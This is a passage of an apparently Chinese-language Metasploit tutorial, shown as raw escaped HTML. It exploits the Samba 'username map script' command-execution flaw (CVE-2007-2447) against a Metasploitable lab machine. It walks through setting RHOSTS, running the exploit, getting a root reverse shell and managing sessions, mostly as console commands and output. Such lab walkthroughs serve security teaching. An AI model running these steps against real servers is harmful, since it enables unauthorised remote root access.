              <\/div>\n<\/div>\n
              \n
              <\/div>\n<\/div>\n<\/li>\n
            3. \n
              \n
              <\/div>\n<\/div>\n
              \n
              Name<\/span>: Samba \"username map script\" Command Execution<\/span><\/div>\n<\/div>\n<\/li>\n
            4. \n
              \n
              <\/div>\n<\/div>\n
              \n
              Module<\/span>: exploit\/multi\/samba\/usermap_script<\/span><\/div>\n<\/div>\n<\/li>\n
            5. \n
              \n
              <\/div>\n<\/div>\n
              \n
              Platform<\/span>: Unix<\/span><\/div>\n<\/div>\n<\/li>\n
            6. \n
              \n
              <\/div>\n<\/div>\n
              \n
              Arch<\/span>: cmd<\/span><\/div>\n<\/div>\n<\/li>\n
            7. \n
              \n
              <\/div>\n<\/div>\n
              \n
              Privileged<\/span>: Yes<\/span><\/div>\n<\/div>\n<\/li>\n
            8. \n
              \n
              <\/div>\n<\/div>\n
              \n
              License<\/span>: Metasploit Framework License (BSD)<\/span><\/div>\n<\/div>\n<\/li>\n
            9. \n
              \n
              <\/div>\n<\/div>\n
              \n
              Rank<\/span>: Excellent<\/span><\/div>\n<\/div>\n<\/li>\n
            10. \n
              \n
              <\/div>\n<\/div>\n
              \n
              Disclosed<\/span>: 2007-05-14<\/span><\/div>\n<\/div>\n<\/li>\n
            11. \n
              \n
              <\/div>\n<\/div>\n
              \n
              ......<\/span><\/div>\n<\/div>\n<\/li>\n
            12. \n
              \n
              <\/div>\n<\/div>\n
              \n
              Description<\/span>:<\/div>\n<\/div>\n<\/li>\n
            13. \n
              \n
              <\/div>\n<\/div>\n
              \n
              This<\/span> module exploits a command execution vulnerability in Samba<\/span><\/div>\n<\/div>\n<\/li>\n
            14. \n
              \n
              <\/div>\n<\/div>\n
              \n
              versions<\/span> 3.0.20 through 3.0.25rc3 when using the non-default<\/span><\/div>\n<\/div>\n<\/li>\n
            15. \n
              \n
              <\/div>\n<\/div>\n
              \n
              \"username<\/span> map script\" configuration option. By specifying a username<\/span><\/div>\n<\/div>\n<\/li>\n
            16. \n
              \n
              <\/div>\n<\/div>\n
              \n
              containing<\/span> shell meta characters, attackers can execute arbitrary<\/span><\/div>\n<\/div>\n<\/li>\n
            17. \n
              \n
              <\/div>\n<\/div>\n
              \n
              commands.<\/span> No authentication is needed to exploit this vulnerability<\/span><\/div>\n<\/div>\n<\/li>\n
            18. \n
              \n
              <\/div>\n<\/div>\n
              \n
              since<\/span> this option is used to map usernames prior to authentication!<\/span><\/div>\n<\/div>\n<\/li>\n
            19. \n
              \n
              <\/div>\n<\/div>\n
              \n
              References<\/span>:<\/div>\n<\/div>\n<\/li>\n
            20. \n
              \n
              <\/div>\n<\/div>\n
              \n
              https<\/span>:\/\/cvedetails.com\/cve\/CVE-2007-2447\/<\/span><\/div>\n<\/div>\n<\/li>\n
            21. \n
              \n
              <\/div>\n<\/div>\n
              \n
              OSVDB<\/span> (34700)<\/span><\/div>\n<\/div>\n<\/li>\n
            22. \n
              \n
              <\/div>\n<\/div>\n
              \n
              http<\/span>:\/\/www.securityfocus.com\/bid\/23972<\/span><\/div>\n<\/div>\n<\/li>\n
            23. \n
              \n
              <\/div>\n<\/div>\n
              \n
              http<\/span>:\/\/labs.idefense.com\/intelligence\/vulnerabilities\/display.php?id=534<\/span><\/div>\n<\/div>\n<\/li>\n
            24. \n
              \n
              <\/div>\n<\/div>\n
              \n
              http<\/span>:\/\/samba.org\/samba\/security\/CVE-2007-2447.html<\/span><\/div>\n<\/div>\n<\/li>\n
            25. \n
              \n
              <\/div>\n<\/div>\n
              \n
              <\/div>\n<\/div>\n<\/li>\n
            26. \n
              \n
              <\/div>\n<\/div>\n
              \n
              msf5<\/span> exploit(multi\/samba\/usermap_script) ><\/span><\/div>\n<\/div>\n<\/li>\n
            27. \n
              \n
              <\/div>\n<\/div>\n
              \n
              \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
              <\/code><\/pre>\n
              \u901a\u8fc7\u6a21\u5757\u63cf\u8ff0\u4fe1\u606f\uff0c\u53ef\u7528\u770b\u51fa\uff0c\u8be5\u6a21\u5757\u5229\u7528Samba 3.0.20<\/code>\u52303.0.25rc<\/code>\u4e2d\u7684\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u3002\u6211\u4eec\u6765\u8bd5\u8bd5\u3002<\/p>\n
              3\u3001\u914d\u7f6e\u53c2\u6570<\/p>\n
              \u901a\u8fc7show missing<\/code>\u547d\u4ee4\uff0c\u67e5\u770b\u5fc5\u987b\u8981\u914d\u7f6e\u7684\u53c2\u6570<\/p>\n
              <\/code><\/pre>\n
                \n
              1. \n
                \n
                <\/div>\n<\/div>\n
                \n
                msf5<\/span> exploit(multi\/samba\/usermap_script) > show missing<\/span><\/div>\n<\/div>\n<\/li>\n
              2. \n
                \n
                <\/div>\n<\/div>\n
                \n
                <\/div>\n<\/div>\n<\/li>\n
              3. \n
                \n
                <\/div>\n<\/div>\n
                \n
                Module<\/span> options (exploit\/multi\/samba\/usermap_script):<\/span><\/div>\n<\/div>\n<\/li>\n
              4. \n
                \n
                <\/div>\n<\/div>\n
                \n
                <\/div>\n<\/div>\n<\/li>\n
              5. \n
                \n
                <\/div>\n<\/div>\n
                \n
                Name<\/span> Current Setting Required Description<\/span><\/div>\n<\/div>\n<\/li>\n
              6. \n
                \n
                <\/div>\n<\/div>\n
                \n
                ----<\/span> --------------- -------- -----------<\/span><\/div>\n<\/div>\n<\/li>\n
              7. \n
                \n
                <\/div>\n<\/div>\n
                \n
                RHOSTS<\/span> yes The target address range or CIDR identifier<\/span><\/div>\n<\/div>\n<\/li>\n
              8. \n
                \n
                <\/div>\n<\/div>\n
                \n
                <\/div>\n<\/div>\n<\/li>\n
              9. \n
                \n
                <\/div>\n<\/div>\n
                \n
                msf5<\/span> exploit(multi\/samba\/usermap_script) ><\/span><\/div>\n<\/div>\n<\/li>\n
              10. \n
                \n
                <\/div>\n<\/div>\n
                \n
                \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                <\/code><\/pre>\n
                TIP\uff1a\u8981\u663e\u793a\u6a21\u5757\u7684\u9ad8\u7ea7\u9009\u9879\uff0c\u4f60\u53ef\u4ee5\u4f7f\u7528show advanced<\/code>\u00a0\u547d\u4ee4<\/p>\n
                \u8fd9\u91cc\u53ea\u9700\u8981\u6211\u4eec\u8bbe\u7f6e\u76ee\u6807\u7684IP<\/code>\u5730\u5740\u5373\u53ef\uff0c\u6211\u4eec\u901a\u8fc7set [options] [value]<\/code>\u6765\u8bbe\u7f6e<\/p>\n
                <\/code><\/pre>\n
                  \n
                1. \n
                  \n
                  <\/div>\n<\/div>\n
                  \n
                  msf5<\/span> exploit(multi\/samba\/usermap_script)<\/span> ><\/span> set<\/span> RHOSTS<\/span> 192.168<\/span>.177<\/span>.145<\/span><\/div>\n<\/div>\n<\/li>\n
                2. \n
                  \n
                  <\/div>\n<\/div>\n
                  \n
                  RHOSTS<\/span> =><\/span> 192.168<\/span>.177<\/span>.145<\/span><\/div>\n<\/div>\n<\/li>\n
                3. \n
                  \n
                  <\/div>\n<\/div>\n
                  \n
                  msf5<\/span> exploit(multi\/samba\/usermap_script)<\/span> ><\/span><\/div>\n<\/div>\n<\/li>\n
                4. \n
                  \n
                  <\/div>\n<\/div>\n
                  \n
                  \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                  <\/code><\/pre>\n
                  4\u3001\u653b\u51fb<\/p>\n
                  \u6267\u884cexploit<\/code>\u5373\u53ef\u3002<\/p>\n
                  <\/code><\/pre>\n
                    \n
                  1. \n
                    \n
                    <\/div>\n<\/div>\n
                    \n
                    msf5 exploit<\/span>(multi\/samba\/usermap_script<\/span>) > exploit<\/span><\/div>\n<\/div>\n<\/li>\n
                  2. \n
                    \n
                    <\/div>\n<\/div>\n
                    \n
                    <\/div>\n<\/div>\n<\/li>\n
                  3. \n
                    \n
                    <\/div>\n<\/div>\n
                    \n
                    [*] Started reverse TCP double<\/span> handler on<\/span> 192.168.177.143:4444<\/span><\/div>\n<\/div>\n<\/li>\n
                  4. \n
                    \n
                    <\/div>\n<\/div>\n
                    \n
                    [*] Accepted the first client connection...<\/span><\/div>\n<\/div>\n<\/li>\n
                  5. \n
                    \n
                    <\/div>\n<\/div>\n
                    \n
                    [*] Accepted the second client connection...<\/span><\/div>\n<\/div>\n<\/li>\n
                  6. \n
                    \n
                    <\/div>\n<\/div>\n
                    \n
                    [*] Command: echo 48vnI4nfAB1GTD5d<\/span>;<\/div>\n<\/div>\n<\/li>\n
                  7. \n
                    \n
                    <\/div>\n<\/div>\n
                    \n
                    [*<\/span>] Writing to socket A<\/div>\n<\/div>\n<\/li>\n
                  8. \n
                    \n
                    <\/div>\n<\/div>\n
                    \n
                    [*<\/span>] Writing to socket B<\/div>\n<\/div>\n<\/li>\n
                  9. \n
                    \n
                    <\/div>\n<\/div>\n
                    \n
                    [*<\/span>] Reading from<\/span> sockets...<\/div>\n<\/div>\n<\/li>\n
                  10. \n
                    \n
                    <\/div>\n<\/div>\n
                    \n
                    [*<\/span>] Reading from<\/span> socket B<\/div>\n<\/div>\n<\/li>\n
                  11. \n
                    \n
                    <\/div>\n<\/div>\n
                    \n
                    [*<\/span>] B: \"48vnI4nfAB1GTD5d\\r\\n\"<\/span><\/div>\n<\/div>\n<\/li>\n
                  12. \n
                    \n
                    <\/div>\n<\/div>\n
                    \n
                    [*<\/span>] Matching...<\/div>\n<\/div>\n<\/li>\n
                  13. \n
                    \n
                    <\/div>\n<\/div>\n
                    \n
                    [*<\/span>] A is<\/span> input...<\/div>\n<\/div>\n<\/li>\n
                  14. \n
                    \n
                    <\/div>\n<\/div>\n
                    \n
                    [*<\/span>] Command shell session 1<\/span> opened (192.168<\/span>.177<\/span>.143<\/span>:4444<\/span> -> 192.168<\/span>.177<\/span>.145<\/span>:51353<\/span>) at 2019<\/span>-04<\/span>-26<\/span> 13<\/span>:14<\/span>:08<\/span> +0800<\/span><\/div>\n<\/div>\n<\/li>\n
                  15. \n
                    \n
                    <\/div>\n<\/div>\n
                    \n
                    <\/div>\n<\/div>\n<\/li>\n
                  16. \n
                    \n
                    <\/div>\n<\/div>\n
                    \n
                    \u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                    <\/code><\/pre>\n
                    \u653b\u51fb\u6210\u529f\u540e\uff0c\u6211\u4eec\u5c06\u83b7\u5f97\u4e0e\u76ee\u6807\u673a\u5668\u7684\u8fde\u63a5\u4f1a\u8bdd\u3002\u6211\u4eec\u53ef\u7528\u6267\u884c\u4e00\u4e9b\u547d\u4ee4\uff0c\u6765\u9a8c\u8bc1\u662f\u5426\u83b7\u5f97\u4e86\u76ee\u6807\u673a\u5668\u7684\u6743\u9650\u3002<\/p>\n
                    <\/code><\/pre>\n
                      \n
                    1. \n
                      \n
                      <\/div>\n<\/div>\n
                      \n
                      hostname<\/div>\n<\/div>\n<\/li>\n
                    2. \n
                      \n
                      <\/div>\n<\/div>\n
                      \n
                      metasploitable<\/div>\n<\/div>\n<\/li>\n
                    3. \n
                      \n
                      <\/div>\n<\/div>\n
                      \n
                      ip a show<\/div>\n<\/div>\n<\/li>\n
                    4. \n
                      \n
                      <\/div>\n<\/div>\n
                      \n
                      1<\/span>: lo:<\/span> <LOOPBACK,UP,LOWER_UP> mtu 16436<\/span> qdisc noqueue<\/div>\n<\/div>\n<\/li>\n
                    5. \n
                      \n
                      <\/div>\n<\/div>\n
                      \n
                      link\/loopback 00<\/span>:00<\/span>:00<\/span>:00<\/span>:00<\/span>:00<\/span> brd 00<\/span>:00<\/span>:00<\/span>:00<\/span>:00<\/span>:00<\/span><\/div>\n<\/div>\n<\/li>\n
                    6. \n
                      \n
                      <\/div>\n<\/div>\n
                      \n
                      inet 127.0<\/span>.0<\/span>.1<\/span>\/8<\/span> scope host lo<\/div>\n<\/div>\n<\/li>\n
                    7. \n
                      \n
                      <\/div>\n<\/div>\n
                      \n
                      inet6 :<\/span>:1<\/span>\/128<\/span> scope host<\/div>\n<\/div>\n<\/li>\n
                    8. \n
                      \n
                      <\/div>\n<\/div>\n
                      \n
                      valid_lft forever preferred_lft forever<\/div>\n<\/div>\n<\/li>\n
                    9. \n
                      \n
                      <\/div>\n<\/div>\n
                      \n
                      2<\/span>: eth0:<\/span> <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500<\/span> qdisc pfifo_fast qlen 1000<\/span><\/div>\n<\/div>\n<\/li>\n
                    10. \n
                      \n
                      <\/div>\n<\/div>\n
                      \n
                      link\/ether 00<\/span>:0<\/span>c:<\/span>29<\/span>:cc:<\/span>9<\/span>a:<\/span>ea brd ff:<\/span>ff:<\/span>ff:<\/span>ff:<\/span>ff:<\/span>ff<\/div>\n<\/div>\n<\/li>\n
                    11. \n
                      \n
                      <\/div>\n<\/div>\n
                      \n
                      inet 192.168<\/span>.177<\/span>.145<\/span>\/24<\/span> brd 192.168<\/span>.177<\/span>.255<\/span> scope global eth0<\/div>\n<\/div>\n<\/li>\n
                    12. \n
                      \n
                      <\/div>\n<\/div>\n
                      \n
                      inet6 fe80:<\/span>:20<\/span>c:<\/span>29<\/span>ff:<\/span>fecc:<\/span>9<\/span>aea\/64<\/span> scope link<\/div>\n<\/div>\n<\/li>\n
                    13. \n
                      \n
                      <\/div>\n<\/div>\n
                      \n
                      valid_lft forever preferred_lft forever<\/div>\n<\/div>\n<\/li>\n
                    14. \n
                      \n
                      <\/div>\n<\/div>\n
                      \n
                      3<\/span>: eth1:<\/span> <BROADCAST,MULTICAST> mtu 1500<\/span> qdisc noop qlen 1000<\/span><\/div>\n<\/div>\n<\/li>\n
                    15. \n
                      \n
                      <\/div>\n<\/div>\n
                      \n
                      link\/ether 00<\/span>:0<\/span>c:<\/span>29<\/span>:cc:<\/span>9<\/span>a:<\/span>f4 brd ff:<\/span>ff:<\/span>ff:<\/span>ff:<\/span>ff:<\/span>ff<\/div>\n<\/div>\n<\/li>\n
                    16. \n
                      \n
                      <\/div>\n<\/div>\n
                      \n
                      id<\/div>\n<\/div>\n<\/li>\n
                    17. \n
                      \n
                      <\/div>\n<\/div>\n
                      \n
                      uid=0<\/span>(root) gid=0<\/span>(root)<\/div>\n<\/div>\n<\/li>\n
                    18. \n
                      \n
                      <\/div>\n<\/div>\n
                      \n
                      \u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                      <\/code><\/pre>\n
                      \u6309Ctrl+Z<\/code>\u53ef\u5c06\u4f1a\u8bdd\u8f6c\u5230\u540e\u53f0<\/p>\n
                      <\/code><\/pre>\n
                        \n
                      1. \n
                        \n
                        <\/div>\n<\/div>\n
                        \n
                        uid=0<\/span>(root) gid=0<\/span>(root)<\/div>\n<\/div>\n<\/li>\n
                      2. \n
                        \n
                        <\/div>\n<\/div>\n
                        \n
                        ^Z \/\/\u6309 Ctrl+Z<\/div>\n<\/div>\n<\/li>\n
                      3. \n
                        \n
                        <\/div>\n<\/div>\n
                        \n
                        Background session 1<\/span>? [y\/N] y<\/span><\/div>\n<\/div>\n<\/li>\n
                      4. \n
                        \n
                        <\/div>\n<\/div>\n
                        \n
                        msf5 exploit(multi\/samba\/usermap<\/span>_script) ><\/div>\n<\/div>\n<\/li>\n
                      5. \n
                        \n
                        <\/div>\n<\/div>\n
                        \n
                        \u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                        <\/code><\/pre>\n
                        5\u3001\u8981\u64cd\u4f5c\u4f1a\u8bdd\uff0c\u53ef\u7528\u4f7f\u7528sessions<\/code>\u547d\u4ee4<\/p>\n
                        <\/code><\/pre>\n
                          \n
                        1. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          msf5 exploit(multi\/samba\/usermap_script) > sessions -h<\/div>\n<\/div>\n<\/li>\n
                        2. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          Usage: sessions [options] or<\/span> sessions [id]<\/div>\n<\/div>\n<\/li>\n
                        3. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          <\/div>\n<\/div>\n<\/li>\n
                        4. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          Active session manipulation and<\/span> interaction.<\/div>\n<\/div>\n<\/li>\n
                        5. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          <\/div>\n<\/div>\n<\/li>\n
                        6. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          OPTIONS:<\/div>\n<\/div>\n<\/li>\n
                        7. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          <\/div>\n<\/div>\n<\/li>\n
                        8. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          -C <opt> Run a Meterpreter Command on<\/span> the session given with<\/span> -i, or<\/span> all<\/div>\n<\/div>\n<\/li>\n
                        9. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          -K Terminate all sessions<\/div>\n<\/div>\n<\/li>\n
                        10. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          -S <opt> Row search filter<\/span>.<\/div>\n<\/div>\n<\/li>\n
                        11. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          -c <opt> Run a command on<\/span> the session given with<\/span> -i, or<\/span> all<\/div>\n<\/div>\n<\/li>\n
                        12. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          -d List all inactive sessions<\/div>\n<\/div>\n<\/li>\n
                        13. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          -h Help banner<\/div>\n<\/div>\n<\/li>\n
                        14. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          -i <opt> Interact with<\/span> the supplied session ID<\/div>\n<\/div>\n<\/li>\n
                        15. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          -k <opt> Terminate sessions by session ID and<\/span>\/or<\/span> range<\/div>\n<\/div>\n<\/li>\n
                        16. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          -l List all active sessions<\/div>\n<\/div>\n<\/li>\n
                        17. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          -n <opt> Name or<\/span> rename a session by ID<\/div>\n<\/div>\n<\/li>\n
                        18. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          -q Quiet mode<\/div>\n<\/div>\n<\/li>\n
                        19. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          -s <opt> Run a script or<\/span> module on<\/span> the session given with<\/span> -i, or<\/span> all<\/div>\n<\/div>\n<\/li>\n
                        20. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          -t <opt> Set<\/span> a response<\/span> timeout (default<\/span>: 15<\/span>)<\/div>\n<\/div>\n<\/li>\n
                        21. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          -u <opt> Upgrade a shell to<\/span> a meterpreter session on<\/span> many platforms<\/div>\n<\/div>\n<\/li>\n
                        22. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          -v List all active sessions in<\/span> verbose mode<\/div>\n<\/div>\n<\/li>\n
                        23. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          -x Show extended information in<\/span> the session table<\/div>\n<\/div>\n<\/li>\n
                        24. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          <\/div>\n<\/div>\n<\/li>\n
                        25. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          Many options allow specifying session ranges using commas and<\/span> dashes.<\/div>\n<\/div>\n<\/li>\n
                        26. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          For<\/span> example: sessions -s checkvm -i 1<\/span>,3<\/span>-5<\/span> or<\/span> sessions -k 1<\/span>-2<\/span>,5<\/span>,6<\/span><\/div>\n<\/div>\n<\/li>\n
                        27. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          <\/div>\n<\/div>\n<\/li>\n
                        28. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          msf5 exploit(multi\/samba\/usermap_script) ><\/div>\n<\/div>\n<\/li>\n
                        29. \n
                          \n
                          <\/div>\n<\/div>\n
                          \n
                          \u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                          <\/code><\/pre>\n
                          6\u3001\u8981\u91cd\u65b0\u56de\u5230\u521a\u624d\u7684\u4f1a\u8bdd\uff0c\u53ef\u4f7f\u7528sessions -i [session_id]<\/code>\u547d\u4ee4\uff0c\u4f7f\u7528sessions -l<\/code>\u53ef\u67e5\u770b\u6240\u6709\u6fc0\u6d3b\u7684\u4f1a\u8bdd\u5217\u8868\u3002<\/p>\n
                          <\/code><\/pre>\n
                            \n
                          1. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            msf5<\/span> exploit(multi\/samba\/usermap_script)<\/span> ><\/span> sessions<\/span> -l<\/span><\/div>\n<\/div>\n<\/li>\n
                          2. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            <\/div>\n<\/div>\n<\/li>\n
                          3. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            Active<\/span> sessions<\/span><\/div>\n<\/div>\n<\/li>\n
                          4. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            ===============<\/span><\/div>\n<\/div>\n<\/li>\n
                          5. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            <\/div>\n<\/div>\n<\/li>\n
                          6. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            Id<\/span> Name<\/span> Type<\/span> Information<\/span> Connection<\/span><\/div>\n<\/div>\n<\/li>\n
                          7. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            --<\/span> ----<\/span> ----<\/span> -----------<\/span> ----------<\/span><\/div>\n<\/div>\n<\/li>\n
                          8. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            1<\/span> shell<\/span> cmd\/unix<\/span> 192.168<\/span>.177<\/span>.143<\/span>:4444<\/span> -><\/span> 192.168<\/span>.177<\/span>.145<\/span>:51353<\/span> (192.168.177.145)<\/span><\/div>\n<\/div>\n<\/li>\n
                          9. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            <\/div>\n<\/div>\n<\/li>\n
                          10. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            msf5<\/span> exploit(multi\/samba\/usermap_script)<\/span> ><\/span> sessions<\/span> -i<\/span> 1<\/span><\/div>\n<\/div>\n<\/li>\n
                          11. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            [*<\/span>] Starting<\/span> interaction<\/span> with<\/span> 1<\/span>...<\/span><\/div>\n<\/div>\n<\/li>\n
                          12. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            <\/div>\n<\/div>\n<\/li>\n
                          13. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            id<\/span><\/div>\n<\/div>\n<\/li>\n
                          14. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            uid=0(root)<\/span> gid=0(root)<\/span><\/div>\n<\/div>\n<\/li>\n
                          15. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            ip<\/span> a<\/span> show<\/span><\/div>\n<\/div>\n<\/li>\n
                          16. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            1: lo:<\/span> <LOOPBACK,UP,LOWER_UP><\/span> mtu<\/span> 16436<\/span> qdisc<\/span> noqueue<\/span><\/div>\n<\/div>\n<\/li>\n
                          17. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            link\/loopback<\/span> 00<\/span>:00:00:00:00:00<\/span> brd<\/span> 00<\/span>:00:00:00:00:00<\/span><\/div>\n<\/div>\n<\/li>\n
                          18. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            inet<\/span> 127.0<\/span>.0<\/span>.1<\/span>\/8<\/span> scope<\/span> host<\/span> lo<\/span><\/div>\n<\/div>\n<\/li>\n
                          19. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            inet6<\/span> ::1\/128<\/span> scope<\/span> host<\/span><\/div>\n<\/div>\n<\/li>\n
                          20. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            valid_lft<\/span> forever<\/span> preferred_lft<\/span> forever<\/span><\/div>\n<\/div>\n<\/li>\n
                          21. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            2: eth0:<\/span> <BROADCAST,MULTICAST,UP,LOWER_UP><\/span> mtu<\/span> 1500 <\/span>qdisc<\/span> pfifo_fast<\/span> qlen<\/span> 1000<\/span><\/div>\n<\/div>\n<\/li>\n
                          22. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            link\/ether<\/span> 00<\/span>:0c:29:cc:9a:ea<\/span> brd<\/span> ff:ff:ff:ff:ff:ff<\/span><\/div>\n<\/div>\n<\/li>\n
                          23. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            inet<\/span> 192.168<\/span>.177<\/span>.145<\/span>\/24<\/span> brd<\/span> 192.168<\/span>.177<\/span>.255<\/span> scope<\/span> global<\/span> eth0<\/span><\/div>\n<\/div>\n<\/li>\n
                          24. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            inet6<\/span> fe80::20c:29ff:fecc:9aea\/64<\/span> scope<\/span> link<\/span><\/div>\n<\/div>\n<\/li>\n
                          25. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            valid_lft<\/span> forever<\/span> preferred_lft<\/span> forever<\/span><\/div>\n<\/div>\n<\/li>\n
                          26. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            3: eth1:<\/span> <BROADCAST,MULTICAST><\/span> mtu<\/span> 1500 <\/span>qdisc<\/span> noop<\/span> qlen<\/span> 1000<\/span><\/div>\n<\/div>\n<\/li>\n
                          27. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            link\/ether<\/span> 00<\/span>:0c:29:cc:9a:f4<\/span> brd<\/span> ff:ff:ff:ff:ff:ff<\/span><\/div>\n<\/div>\n<\/li>\n
                          28. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            <\/div>\n<\/div>\n<\/li>\n
                          29. \n
                            \n
                            <\/div>\n<\/div>\n
                            \n
                            \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                            <\/code><\/pre>\n
                            \u8981\u7ec8\u6b62\u4f1a\u8bdd\uff0c\u53ef\u7528\u6309Ctrl+c<\/code>\u3002<\/p>\n
                            <\/code><\/pre>\n
                              \n
                            1. \n
                              \n
                              <\/div>\n<\/div>\n
                              \n
                              link\/ether 00<\/span>:0<\/span>c:<\/span>29<\/span>:cc:<\/span>9<\/span>a:<\/span>f4 brd ff:<\/span>ff:<\/span>ff:<\/span>ff:<\/span>ff:<\/span>ff<\/div>\n<\/div>\n<\/li>\n
                            2. \n
                              \n
                              <\/div>\n<\/div>\n
                              \n
                              ^C \/\/Ctrl+C <\/span><\/div>\n<\/div>\n<\/li>\n
                            3. \n
                              \n
                              <\/div>\n<\/div>\n
                              \n
                              Abort session 1<\/span>? [y\/N] y \/<\/span>\/\u8f93\u5165 y<\/div>\n<\/div>\n<\/li>\n
                            4. \n
                              \n
                              <\/div>\n<\/div>\n
                              \n
                              \"\"<\/span><\/div>\n<\/div>\n<\/li>\n
                            5. \n
                              \n
                              <\/div>\n<\/div>\n
                              \n
                              <\/div>\n<\/div>\n<\/li>\n
                            6. \n
                              \n
                              <\/div>\n<\/div>\n
                              \n
                              [*] 192.168<\/span>.177<\/span>.145<\/span> - Command shell session 1<\/span> closed. Reason: User exit<\/div>\n<\/div>\n<\/li>\n
                            7. \n
                              \n
                              <\/div>\n<\/div>\n
                              \n
                              msf5 exploit(multi\/samba\/<\/span>usermap_script) ><\/div>\n<\/div>\n<\/li>\n
                            8. \n
                              \n
                              <\/div>\n<\/div>\n
                              \n
                              \u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                              <\/code><\/pre>\n
                              \u5b83\u662f\u5982\u4f55\u5de5\u4f5c\u7684<\/h5>\n
